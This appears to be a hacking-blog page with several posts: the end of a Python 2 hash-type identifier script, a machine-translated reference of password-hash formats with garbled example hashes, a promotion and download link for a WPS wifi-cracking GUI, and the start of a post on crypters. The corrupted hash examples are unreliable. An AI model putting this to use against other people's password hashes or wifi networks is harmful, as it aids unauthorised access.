    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106340") 
def md5saltmd5passsalt(): 
    hs='de0237dc03a8efdf6552fbe7788b2fdd' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106360") 
def md5saltmd5passsalt(): 
    hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106380") 
def md5saltmd5saltpass(): 
    hs='d8f3b3f004d387086aae24326b575b23' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106400") 
def md5saltmd5md5passsalt(): 
    hs='81f181454e23319779b03d74d062b1a2' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106420") 
def md5username0pass(): 
    hs='e44a60f8f2106492ae16581c91edb3ba' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106440") 
def md5usernameLFpass(): 
    hs='654741780db415732eaee12b1b909119' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106460") 
def md5usernamemd5passsalt(): 
    hs='954ac5505fd1843bbb97d1b2cda0b98f' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106480") 
def md5md5pass(): 
    hs='a96103d267d024583d5565436e52dfb3' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106500") 
def md5md5passsalt(): 
    hs='5848c73c2482d3c2c7b6af134ed8dd89' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106520") 
def md5md5passmd5salt(): 
    hs='8dc71ef37197b2edba02d48c30217b32' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106540") 
def md5md5saltpass(): 
    hs='9032fabd905e273b9ceb1e124631bd67' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106560") 
def md5md5saltmd5pass(): 
    hs='8966f37dbb4aca377a71a9d3d09cd1ac' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106580") 
def md5md5usernamepasssalt(): 
    hs='4319a3befce729b34c3105dbc29d0c40' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106600") 
def md5md5md5pass(): 
    hs='ea086739755920e732d0f4d8c1b6ad8d' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106620") 
def md5md5md5md5pass(): 
    hs='02528c1f2ed8ac7d83fe76f3cf1c133f' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106640") 
def md5md5md5md5md5pass(): 
    hs='4548d2c062933dff53928fd4ae427fc0' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106660") 
def md5sha1pass(): 
    hs='cb4ebaaedfd536d965c452d9569a6b1e' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106680") 
def md5sha1md5pass(): 
    hs='099b8a59795e07c334a696a10c0ebce0' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106700") 
def md5sha1md5sha1pass(): 
    hs='06e4af76833da7cc138d90602ef80070' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106720") 
def md5strtouppermd5pass(): 
    hs='519de146f1a658ab5e5e2aa9b7d2eec8' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106740") 
 
def LineageIIC4(): 
    hs='0x49a57f66bd3d5ba6abda5579c264a0e4' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: 
        jerar.append("107080") 
def MD5phpBB3(): 
    hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: 
        jerar.append("107040") 
def MD5Unix(): 
    hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: 
        jerar.append("107060") 
def MD5Wordpress(): 
    hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: 
        jerar.append("107020") 
 
def MD5APR(): 
    hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: 
        jerar.append("108020") 
 
def Haval160(): 
    hs='a106e921284dd69dad06192a4411ec32fce83dbb' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109100") 
def Haval160HMAC(): 
    hs='29206f83edc1d6c3f680ff11276ec20642881243' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109200") 
def MySQL5(): 
    hs='9bb2fb57063821c762cc009f7584ddae9da431ff' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109040") 
def MySQL160bit(): 
    hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: 
        jerar.append("109060") 
def RipeMD160(): 
    hs='dc65552812c66997ea7320ddfb51f5625d74721b' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109120") 
def RipeMD160HMAC(): 
    hs='ca28af47653b4f21e96c1235984cb50229331359' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109180") 
def SHA1(): 
    hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109020") 
def SHA1HMAC(): 
    hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109140") 
def SHA1MaNGOS(): 
    hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109220") 
def SHA1MaNGOS2(): 
    hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109240") 
def Tiger160(): 
    hs='c086184486ec6388ff81ec9f235287270429b225' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109080") 
def Tiger160HMAC(): 
    hs='6603161719da5e56e1866e4f61f79496334e6a10' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109160") 
def sha1passsalt(): 
    hs='f006a1863663c21c541c8d600355abfeeaadb5e4' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109260") 
def sha1saltpass(): 
    hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109280") 
def sha1saltmd5pass(): 
    hs='860465ede0625deebb4fbbedcb0db9dc65faec30' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109300") 
def sha1saltmd5passsalt(): 
    hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109320") 
def sha1saltsha1pass(): 
    hs='58714327f9407097c64032a2fd5bff3a260cb85f' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109340") 
def sha1saltsha1saltsha1pass(): 
    hs='cc600a2903130c945aa178396910135cc7f93c63' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109360") 
def sha1usernamepass(): 
    hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109380") 
def sha1usernamepasssalt(): 
    hs='00025111b3c4d0ac1635558ce2393f77e94770c5' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109400") 
def sha1md5pass(): 
    hs='fa960056c0dea57de94776d3759fb555a15cae87' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("1094202") 
def sha1md5passsalt(): 
    hs='1dad2b71432d83312e61d25aeb627593295bcc9a' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109440") 
def sha1md5sha1pass(): 
    hs='8bceaeed74c17571c15cdb9494e992db3c263695' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109460") 
def sha1sha1pass(): 
    hs='3109b810188fcde0900f9907d2ebcaa10277d10e' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109480") 
def sha1sha1passsalt(): 
    hs='780d43fa11693b61875321b6b54905ee488d7760' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109500") 
def sha1sha1passsubstrpass03(): 
    hs='5ed6bc680b59c580db4a38df307bd4621759324e' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109520") 
def sha1sha1saltpass(): 
    hs='70506bac605485b4143ca114cbd4a3580d76a413' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109540") 
def sha1sha1sha1pass(): 
    hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109560") 
def sha1strtolowerusernamepass(): 
    hs='79f575543061e158c2da3799f999eb7c95261f07' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("109580") 
 
def Haval192(): 
    hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("110040") 
def Haval192HMAC(): 
    hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("110080") 
def Tiger192(): 
    hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("110020") 
def Tiger192HMAC(): 
    hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("110060") 
 
def MD5passsaltjoomla1(): 
    hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: 
        jerar.append("112020") 
 
def SHA1Django(): 
    hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: 
        jerar.append("113020") 
 
def Haval224(): 
    hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("114040") 
def Haval224HMAC(): 
    hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("114080") 
def SHA224(): 
    hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("114020") 
def SHA224HMAC(): 
    hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("114060") 
 
def SHA256(): 
    hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("115020") 
def SHA256HMAC(): 
    hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("115120") 
def Haval256(): 
    hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("115040") 
def Haval256HMAC(): 
    hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("115140") 
def GOSTR341194(): 
    hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("115060") 
def RipeMD256(): 
    hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("115080") 
def RipeMD256HMAC(): 
    hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("115160") 
def SNEFRU256(): 
    hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("115100") 
def SNEFRU256HMAC(): 
    hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("115180") 
def SHA256md5pass(): 
    hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("115200") 
def SHA256sha1pass(): 
    hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("115220") 
 
def MD5passsaltjoomla2(): 
    hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: 
        jerar.append("116020") 
def SAM(): 
    hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: 
        jerar.append("116040") 
 
def SHA256Django(): 
    hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: 
        jerar.append("117020") 
 
def RipeMD320(): 
    hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("118020") 
def RipeMD320HMAC(): 
    hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("118040") 
 
def SHA384(): 
    hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("119020") 
def SHA384HMAC(): 
    hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("119040") 
 
def SHA256s(): 
    hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: 
        jerar.append("120020") 
 
def SHA384Django(): 
    hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: 
        print " [+] SHA-384(Django)" 
        jerar.append("121020") 
 
def SHA512(): 
    hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("122020") 
def SHA512HMAC(): 
    hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("122060") 
def Whirlpool(): 
    hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("122040") 
def WhirlpoolHMAC(): 
    hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("122080") 
 
 
print logo 
while True: 
    jerar=[] 
    print """ 
   -------------------------------------------------------------------------""" 
    hash = raw_input(" HASH: ") 
    ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() 
 
    if len(jerar)==0: 
        print "" 
        print " Not Found." 
    elif len(jerar)>2: 
        jerar.sort() 
        print "" 
        print "Possible Hashs:" 
        print "[+] ",algorithms[jerar[0]] 
        print "[+] ",algorithms[jerar[1]] 
        print "" 
        print "Least Possible Hashs:" 
        for a in range(int(len(jerar))-2): 
            print "[+] ",algorithms[jerar[a+2]] 
    else: 
        jerar.sort() 
        print "" 
        print "Possible Hashs:" 
        for a in range(len(jerar)): 
            print "[+] ",algorithms[jerar[a]]

2:53 AM
0 response
Read More



DES (Unix)
Example: IvS7aeT4NzQPM
Used in Linux and similar OS.
Length: 13 characters.
Description: The first two characters are the salt (random characters in our Examples salt is the string "IV"), then follows the current hash.


Cached domain credentials
Example: Admin: b474d48cdfc4974d86ef4d24904cdd91
It is used to cache passwords for Windows domain.
Length: 16 bytes.
Algorithm: MD4 (MD4 (Unicode ($ pass)). Unicode (strtolower ($ username)))


MD5 (Unix)
Example: $ $ 1 $ 12,345,678 XM4P3PrKBgKNnTaqG9P0T /
Used in Linux and similar OS.
Length: 34 characters
Description: The signature hash begins with $ 1 $, then there goes the salt (up to 8 random characters in our Examples salt is the string "12345678"), then there is one plus the $ character, followed by current hash.
Algorithm: The truth is that it is a circuit called the MD5 algorithm 2000 times.

MD5 (APR)
Example: $ $ $ 12345678 auQSX8Mvzt.tdBi4y6Xgj apr1.
Used in Linux and similar OS.
Length: 37 characters
Description: The hash begins with the signing apr1 $ $, then there goes the salt (up to 8 random characters in our Examples salt is the string "12345678"), then there is one plus the $ character, followed by current hash.
Algorithm: The truth is that it is a circuit called the MD5 algorithm 2000 times.

MD5 (phpBB3)
Example: $ H $ 9123456785DAERgALpsri.D9z3ht120
3.x.x. used phpBB (forums)
Length: 34 characters.
Description: The signature hash begins with $ H $, then there is a character (usually the number '9 '), then there goes the salt (8 random characters in our Examples salt is the string "12345678"), followed by the current hash.
Algorithm: The truth is that it is a circuit called the MD5 algorithm 2048 times.


MD5 (Wordpress)
Example: $ P $ B123456780BhGFYSlUqGyE6ErKErL01
Used in Wordpress.
Length: 34 characters.
Description: The signature hash begins with $ P $, then there goes one of the characters (most often "B" number), then there goes the salt (8 random characters in our Examples salt is the chain "12345678"), followed by the current hash.
Algorithm: The truth is that it is a circuit called the MD5 algorithm 8192 times.


MySQL
Example: 606717496665bcba
Used in older versions of MySQL
Length: 8 bytes.
Description: The hash is composed of two DWORD, each not exceeding the value of 0x7fffffff.

MySQL5
Example: * E6CC90B878B948C35E92B003C792C46C58C4AF40
Used in new versions of MySQL5
Length: 20 bytes.
algorithm: SHA-1 (SHA-1 ($ pass))
Note: hashes to be loaded into the program without the asterisk is in the beginning of each hash.

RAdmin v2.x
Example: 5e32cceaafed5cc80866737dfb212d7f
Used in the application Remote Administrator v2.x
Length: 16 bytes.
Note: The password is padded with zeros to the length of 100 bytes, which hosts all the string with the MD5 algorithm.

MD5
Example: c4ca4238a0b923820dcc509a6f75849b
Used in v2.x phpBB, Joomla version 1.0.13 below and many other forums and CMS.
Length: 16 bytes.
Algorithm: Same as the function md5 () in PHP.

md5 ($ pass. $ salt)
Example: 6f04f0d75f6870858bae14ac0b6d9f73: 1234
Used in WB News, Joomla version 1.0.13 and above.
Length: 16 bytes.

md5 ($ salt. $ pass)
Example: f190ce9ac8445d249747cab7be43f7d5: 12
Used in osCommerce, AEF, Gallery and other CMS.
(OsCommerce had a bigger fault ..)
Length: 16 bytes.

md5 (md5 ($ pass))
Example: 28c8edde3d61a0411511d3b1866f0636
Used in e107, DLE, AVE, Diferior, Koobi CMS and others.
Length: 16 bytes.

md5 (md5 ($ pass). $ salt)
Example: 6011527690eddca23580955c216b1fd2: wQ6
Featured on vBulletin IceBB.
Length: 16 bytes.


md5 (md5 ($ salt). md5 ($ pass))
Example: 81f87275dd805aa018df8befe09fe9f8: wH6_S
Used in IPB.
Length: 16 bytes.

md5 (md5 ($ salt). $ pass)
Example: 816a14db44578f516cbaef25bd8d8296: 1234
Used in MyBB.
Length: 16 bytes.


md5 ($ salt. $ pass. $ salt)
Example: a3bc9e11fddf4fef4deea11e33668eab: 1234
TBDev used.
Length: 16 bytes.

md5 ($ salt.md5 ($ salt. $ pass))
Example: 1d715e52285e5a6b546e442792652c8a: 1234
Used in DLP.
Length: 16 bytes.

SHA-1
Example: 356a192b7913b04c54574d18c28d46e6395428ab
Used in many forums and CMS.
Length: 20 bytes.
Algorithm: Same as sha1 () in PHP.

sha1 (strtolower ($ username). $ pass)
Example: Admin: 6c7ca345f63f835cb353ff15bd6c5e052ec08e7a
Used in SMF.
Length: 20 bytes.

sha1 ($ salt.sha1 ($ salt.sha1 ($ pass)))
Example: cd37bfbf68d198d11d39a67158c0c9cddf34573b: 1234
Used in WoltLab BB.
Length: 20 bytes.

SHA-256 (Unix)
Example: $ $ 5 $ 12,345,678 jBWLgeYZbSvREnuBr5s3gp13vqiKSNK1rkTk9z YE1v0
Used in Linux and similar OS.
Length: 55 characters.
Description: The hash begins with the signing of $ 5 $, then there goes the salt (up to 8 random characters in our Examples salt is the string "12345678"), then there is one plus the $ character, followed by the current hash.
Algorithm: The truth is that it is a circuit called the algorithm SHA-256 5000 times.


SHA-512 (Unix)
Example: $ $ 6 $ 12,345,678 U6Yv5E1lWn6mEESzKen42o6rbEmFNLlq6Ik9X3reMXY3doKEuxrcDohKUx0Oxf44aeTIxGEjssvtT1aKyZHjs
Used in Linux and similar OS.
Length: 98 characters.
Description: The hash begins with the signing of $ 6 $, then there goes the salt (up to 8 random characters in our Examples salt is the string "12345678"), then there is one plus the $ character, followed by the current hash.
Algorithm: The truth is that it is a circuit called the algorithm SHA-512 5000 times.

Greetz: Team MetalSoft

2:49 AM
2 response
Read More

Most of them use Reaver, which was used to crack wifi by using WPS (WiFi Protected Setup), but now to simplify things a tool is released that automates this task.

WPSCrackGUI is a graphical interface for cracking wireless networks with WPS.

Its use is fairly easy and interactive
Features:

Graphic User Interface (GUI) WPS encryption cracking.
Updated Assisted Reaver-WPS.
Database with PINs.
Change MAC Address.
Supported in Gt and Gtk.
Scan networks.


It has support for Debian, Fedora, Mandriva, SLAX, OpenSUSE, Ubuntu and AirUbuntu. It installs as a single executable .deb .

How it works ?
Watch this video
Project: http://sourceforge.net/projects/wpscrackgui/

Download:


Download File Here
2:37 AM
1 response
Read More

Most of them might have doubt what is this crypter and how it is used. Well before going to the actual information let's see what exactly crypter is .

